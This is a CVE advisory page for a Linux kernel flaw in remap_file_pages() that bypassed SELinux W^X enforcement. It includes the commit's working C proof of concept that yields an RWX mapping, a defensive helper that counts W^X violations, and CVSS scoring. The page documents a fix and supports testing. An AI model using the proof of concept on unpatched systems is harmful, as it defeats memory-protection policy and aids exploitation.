CVE-2024-47745 Information

Description

In the Linux kernel the following vulnerability has been resolved:

mm: call the security_mmap_file() LSM hook in remap_file_pages()

The remap_file_pages syscall handler calls do_mmap() directly, which doesn't contain the LSM security check. And if the process has called personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for RW pages, this will actually result in remapping the pages to RWX, bypassing a W^X policy enforced by SELinux.

So we should check prot via the security_mmap_file LSM hook in the remap_file_pages syscall handler before do_mmap() is called. Otherwise it potentially permits an attacker to bypass a W^X policy enforced by SELinux.

The bypass is similar to CVE-2016-10044, which bypasses the same thing via AIO and can be found in [1].

The PoC:

$ cat > test.c

    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/personality.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    int main(void)
    {
        size_t pagesz = sysconf(_SC_PAGE_SIZE);
        int mfd = syscall(SYS_memfd_create, "test", 0);
        /* an ordinary RW shared mapping of the memfd, no exec bit */
        const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
                               MAP_SHARED, mfd, 0);
        /* query the current persona, then add READ_IMPLIES_EXEC */
        unsigned int old = syscall(SYS_personality, 0xffffffff);
        syscall(SYS_personality, READ_IMPLIES_EXEC | old);
        /* remap_file_pages() goes straight to do_mmap(): no LSM check,
         * and READ_IMPLIES_EXEC turns the RW mapping into RWX */
        syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
        syscall(SYS_personality, old);
        // show the RWX page exists even if W^X policy is enforced
        int fd = open("/proc/self/maps", O_RDONLY);
        unsigned char buf2[1024];
        while (1) {
            int ret = read(fd, buf2, 1024);
            if (ret <= 0)
                break;
            write(1, buf2, ret);
        }
        close(fd);
        return 0;
    }

$ gcc test.c -o test
$ ./test | grep rwx
7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
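The grep above is the whole check: after the remap, a mapping with both w and x set appears in /proc/self/maps. The following C helper, added here as an example and not part of the commit or of the kernel tree, turns that manual grep into a function that parses a maps listing and counts W^X violations, so a regression test can assert on the result instead of eyeballing output. The function names (count_wx_mappings, count_self_wx_mappings) and the embedded sample maps text are assumptions constructed for the example; the sample reproduces the line the PoC prints.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper (added example): parse the text of a /proc/<pid>/maps
 * listing and count mappings whose permission field contains both 'w' and
 * 'x', i.e. mappings that violate W^X. One line looks like:
 *   start-end perms offset dev inode [path]
 */
int count_wx_mappings(const char *maps_text)
{
    int count = 0;
    const char *line = maps_text;

    while (line && *line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char tmp[512], addr[64], perms[8];

        if (len >= sizeof(tmp))
            len = sizeof(tmp) - 1;
        memcpy(tmp, line, len);
        tmp[len] = '\0';

        /* first field is the address range, second is the 4-char perms */
        if (sscanf(tmp, "%63s %7s", addr, perms) == 2 &&
            strchr(perms, 'w') && strchr(perms, 'x'))
            count++;

        line = nl ? nl + 1 : NULL;
    }
    return count;
}

/* Read the calling process's own maps and return its W^X violation count,
 * or -1 if /proc/self/maps cannot be opened. */
int count_self_wx_mappings(void)
{
    char buf[65536];
    ssize_t n, total = 0;
    int fd = open("/proc/self/maps", O_RDONLY);

    if (fd < 0)
        return -1;
    while (total < (ssize_t)(sizeof(buf) - 1) &&
           (n = read(fd, buf + total, sizeof(buf) - 1 - total)) > 0)
        total += n;
    close(fd);
    buf[total] = '\0';
    return count_wx_mappings(buf);
}

/* Constructed sample (not captured from a real system): an RW memfd page,
 * the RWX page the PoC produces, and a normal r-x library mapping. */
static const char sample_maps[] =
    "7f1836c32000-7f1836c34000 rw-s 00000000 00:01 2050 /memfd:test (deleted)\n"
    "7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)\n"
    "7f1836c35000-7f1836c36000 r-xp 00000000 08:01 1234 /usr/lib/libc.so.6\n";

int main(void)
{
    printf("sample maps: %d W^X violation(s)\n", count_wx_mappings(sample_maps));
    int live = count_self_wx_mappings();
    if (live < 0)
        printf("could not read /proc/self/maps\n");
    else
        printf("this process: %d W^X violation(s)\n", live);
    return 0;
}
```

To use it as a regression check, run the PoC's remap sequence in the same process and then call count_self_wx_mappings(): a non-zero result on a kernel without the fix shows the bypass, and zero on a patched kernel with an LSM W^X policy in force shows the security_mmap_file() check now rejects the remap.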

[PM: subject line tweaks]

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Reference

https://git.kernel.org/stable/c/49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178
https://git.kernel.org/stable/c/3393fddbfa947c8e1fdcc4509226905ffffd8b89
https://git.kernel.org/stable/c/ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3
https://git.kernel.org/stable/c/ea7e2d5e49c05e5db1922387b09ca74aa40f46e2

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction Required

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

Base Score

7.8

Base Severity

HIGH
